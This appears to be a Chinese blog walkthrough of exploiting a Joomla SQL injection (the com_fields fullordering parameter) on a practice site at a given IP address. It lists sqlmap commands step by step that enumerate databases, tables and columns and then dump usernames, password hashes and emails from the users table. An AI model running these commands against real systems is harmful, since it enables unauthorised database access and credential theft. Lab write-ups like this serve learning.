0
点赞
收藏
分享

微信扫一扫

sqlmap 注入 爆破txt平台

无愠色 2022-04-02 阅读 70

这里我用的是 joomla 先进入 txt 网站平台 网站:http://110.40.154.100:8080/?id=1

第一步:找注入点

"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D="

第二步:打开kali 用sqlmap 爆破 找其数据库名(过程很慢 耐心等待)

sqlmap -u "http://110.40.154.100:8080/index.php option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" --dbs 

 第三步:在joomla 库中找表名 (过程很慢 耐心等待)

 sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomla --tables

这样表名就出来了

 第四步:在表中找字段名  (过程很慢 耐心等待)

 sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomla -T '#__users' --columns  

 这样列名就出来了

 最后一步 找 用户名、密码和邮箱

sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomla -T '#__users' -C username,password,email --dump

 稍等一会 用户名、密码和邮箱就已经破解成功了(这里的密码进行加密了,所以不用管它)

举报

相关推荐

0 条评论